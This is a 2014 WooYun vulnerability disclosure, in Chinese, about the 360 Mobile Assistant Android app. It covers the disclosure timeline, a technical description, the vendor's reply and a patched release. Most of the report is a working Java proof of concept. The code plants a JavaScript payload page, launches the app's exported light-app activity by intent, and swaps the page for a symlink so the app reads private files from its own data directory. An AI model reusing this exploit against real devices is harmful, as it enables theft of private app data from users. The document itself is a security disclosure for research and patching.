漏洞详情

披露状态:

2014-01-18: 细节已通知厂商并且等待厂商处理中
2014-01-19: 厂商已经确认,细节仅向厂商公开
2014-01-22: 细节向第三方安全合作伙伴开放
2014-01-29: 细节向核心白帽子及相关领域专家公开
2014-02-08: 细节向普通白帽子公开
2014-02-28: 细节向实习白帽子公开
2014-04-18: 细节向公众公开

简要描述:

据说安装量好几个亿

详细说明:

利用符号链接,可以绕过文件同源性策略的限制,调用com.qihoo.lightapp.WebAppFakeBrowserLightActivity组件解析执行特定的JavaScript脚本,可以窃取任意私有文件的内容。

具体利用可参考刚公布出来的firefox此类漏洞的利用,详细url参看: https://viaforensics.com/mobile-security/chained-vulnerabilities-firefox-android-pimp-browser.html

POC如下(借鉴x3xtxt的代码):

String sensitive_file_name = "/data/data/com.qihoo.appstore/shared_prefs/common_config.xml";		

DP_WebViewReadAnyFilePoC(sensitive_file_name);
}

@Override
public boolean onCreateOptionsMenu(Menu menu) {
// Inflate the menu; this adds items to the action bar if it is present.
getMenuInflater().inflate(R.menu.main, menu);
return true;
}


public void DP_WebViewReadAnyFilePoC(String targetfile){

try{



String shell_poc = "/data/data/"+getApplicationContext().getPackageName()+"/files/shellpoc.html";



write_payload_file();

cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});





String pkgName = "com.qihoo.appstore";

String activityName = "com.qihoo.lightapp.WebAppFakeBrowserLightActivity";

String url = "file://"+shell_poc;



Intent intent = new Intent();

intent.setAction("com.qihoo.light.action.WEBAPP_LINK");

intent.setComponent(new ComponentName(pkgName, activityName));

intent.setData(Uri.parse(url));

startActivity(intent);



Thread.sleep(2000);



cmdexec(new String[] {"/system/bin/rm", shell_poc});

cmdexec(new String[] {"/system/bin/ln", "-s", targetfile, shell_poc});

cmdexec(new String[] {"/system/bin/chmod", "-R", "777", shell_poc});



Thread.sleep(5000);



cmdexec(new String[] {"/system/bin/rm", shell_poc});

}catch(Exception e){

debugInfo(e.getMessage());

}

}



@SuppressWarnings("deprecation")

public void write_payload_file(){

String payloadStr = "function getContent(){ \n" +

" var url = location.href; \n" +

" var xmlhttp; \n" +

" if(window.XMLHttpRequest){ \n" +

" xmlhttp=new XMLHttpRequest(); \n" +

" }else{ \n" +

" xmlhttp=new ActiveXObject(\"Microsoft.XMLHTTP\"); \n" +

" } \n" +

" \n" +

" xmlhttp.onreadystatechange=function() \n" +

" { \n" +

" if (xmlhttp.readyState==4) \n" +

" { \n" +



" alert(xmlhttp.responseText); \n" +

" } \n" +

" } \n" +

" xmlhttp.open(\"GET\",url,true); \n" +

" xmlhttp.send(); \n" +

"} \n" +

" \n" +

"setTimeout(getContent,4000); \n";

String htmlStr = "<html> \n" +

"<head><title>Steal Sensitive Information PoC</title></head> \n" +

"<body> \n" +

" <script type=\"text/javascript\"> \n" +

payloadStr +

" </script> \n" +

"</body> \n" +

"</html>";

try{

FileOutputStream fOut = openFileOutput("shellpoc.html", Context.MODE_WORLD_READABLE);

fOut.write(htmlStr.getBytes());

fOut.close();

}catch(Exception e){

debugInfo(e.getMessage());

}

}



public void cmdexec(String[] cmd){

try{

Runtime.getRuntime().exec(cmd);

}catch(Exception e){

debugInfo(e.getMessage());

}

}

漏洞证明:

2.jpg

修复方案:

限制符号链接

版权声明:转载请注明来源 燕子侠@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-01-19 20:06

厂商回复:

最新状态:

2014-01-19:感谢乌云平台和燕子侠提供的漏洞信息。 这并不360手机助手的漏洞,而是Andriod原生Webview的漏洞。且只有root权限或本地存在恶意app的情况下,才可能被恶意利用。 我们已经更新发布新版本进行修补,用户升级即可解决,附上新版本链接 Web下载页面: http://www.360.cn/shoujizhushou/index.html wap下载页面: http://m.360.cn/zs http://m.360.cn/nwap/baohe.html 文件下载链接: http://down.360safe.com/360mobilemgr/360box_web.apk


漏洞评价: